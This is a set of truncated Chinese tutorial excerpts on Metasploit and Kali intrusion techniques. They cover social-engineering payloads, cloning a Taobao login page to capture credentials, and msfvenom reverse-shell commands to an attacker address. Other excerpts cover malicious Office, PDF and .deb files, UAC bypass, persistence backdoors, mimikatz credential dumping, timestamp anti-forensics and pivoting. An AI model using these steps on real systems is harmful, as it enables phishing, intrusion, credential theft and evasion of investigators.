启动社会工程学攻击组件 生成二维码攻击模块 输入你想生成二维码的url,这里做演示用www.baidu.com 二维码生成后,在这个路径下 生成u盘,DVD的多媒体攻击载荷 通过修改autorun.inf这个文件,当被攻击主机读取U盘.DVD的设备时,注入攻击载荷. 克隆网站 1232 设置kali本机的IP 设置想要克隆的页面URL地址 在本机启动Apache服务 这样就克隆成功了, 克隆的页面存放在 当在页面输入192.168.21.31时进入的是淘宝的页面 当在这个页面输入用户名密码点登陆…
在无法通过网络边界的情况下转而攻击客户端----进行社会工程学攻击,进而渗透线上业务网络 含有漏洞利用代码的web站点--利用客户端漏洞 含有漏洞利用代码的doc,pdf等文档----诱使被害者执行payload 诱骗被害者执行payload(windows) msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=192.168.1.10 LPORT=4444 -b "\x00" -e x86/shi…
弱点扫描 根据信息收集的结果搜索漏洞利用模块 结合外部漏洞扫描系统对大IP地址段进行批量扫描 误报率.漏报率 VNC密码破解 客户端渗透 VBScript感染方式 利用  宏  感染word.excel文档 绕过某些基于文件类型检查的安全机制 一般人对word.excel的格式看来是没有安全威胁的,没有防范 生成Payload msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=192.168.1…
嗅探抓包 查看网卡 指定网卡,因为资源有限,默认抓满50000个包如果不dump下来,就会自动销毁掉,从0开始抓. dump嗅探到的文件到本机,传递到本机的过程是结果ssl加密的 dump了两个文件 解包 指定想要解包文件 run 搜索文件 破解弱口令 需要有一个system权限的session 使用hashdump 使用system权限的session exploit 结果保存在/tmp目录下 使用弱密码破解工具 run执行 修改MACE时间 最好的避免电子取证发现的方法:不要碰文件系统 me…
对普通权限session提权 生成一个木马 开启Apache服务 将木马上传网页 被攻击者从这个网页上获取到这个木马 攻击者开启msf侦听 当被攻击者双击这个木马文件时 攻击者就获取到一个session 进入到这个session 加载priv模块getsystem提权,但是失败了,这是由于win7系统上UAC的限制 后退 使用提权模块ask 使用刚才那个没有提权权限的session 1 exploit 被攻击者就会收到一个对话框,如果点了yes 攻击者就会收到一个session sessions…
这个漏洞利用只在XP上有效 利用pdf漏洞利用payload exploit生成一个pdf文件 传到被攻击机上 启动msf侦听 exploit -j XP上双击运行这个pdf时,kali获取到一个shell 构造恶意网站 exploit 生成一个网站 被攻击者点到这个网站时 攻击机就获得了一个session 提权 开启键盘记录,结果记录到以下文件中 利用flash插件漏洞执行payload 要满足这样一个条件 生成一个服务 当被攻击者点开这个网址 攻击者就收到了一个shell 类似的攻击模块还有…
针对Windows 开启侦听 查看payload选项 将1.exe传到网页上 win7访问网页并下载1.exe 下载好之后双击运行,在服务器端就获得了一个shell   针对linux 先获取到一个软件包 在/var/cache/apt/archives目录下查看下载的安装包 将这个安装包拷贝到home目录下,解包到free目录下 创建一个目录 创建control文件 输入以下内容 创建一个postinst文件 输入以下内容 #!/bin/sh sudo chmod 2755 /usr/game…
如果一个网页存在可以include外链的漏洞,我们可以利用这个漏洞include本机上的文件,从而获取web服务器的shell. 设置目标的IP 根据网页的路径设置参数 设置cookie 选择payload 设置本地IP exploit获取session…
持续后门 先获取一个session 在目标主机上生成持续后门 设置侦听参数 启动侦听 重新启动被攻击的主机 一启动攻击者时获取到session mimikatz的使用 mimikatz是俄罗斯组织开发的工具 加载mimikatz help查看命令 msv获取用户名和hash wdigest获取内存中的明文密码信息 kerberos获取内存中的明文密码信息 查看hash 查看bootkey 查看被攻击主机上运行的进程 查看被攻击主机上运行的服务 查看被攻击主机的加密条件 PHP shell 生成一…
跳板 假设有这样一个场景,有一个局域网内网网关是1.1.1.1,局域网里的主机1是kali,它经过一个防火墙连接到公网,主机2和主机3在另一个内网网关为2.1.1.1的局域网,由于防火墙做了设置,只有主机2可以通过防火墙连接到公网,主机3无法通过防火墙连接到公网,但是主机2和主机3是互联的.两个局域网可以通过公网的路由相互连接. 防火墙1设置了端口映射规则,将防火墙的4444端口映射到主机1的4444端口,当主机1侦听本机的4444端口时相当于侦听防火墙的4444端口 主机1已经获得了主机2的s…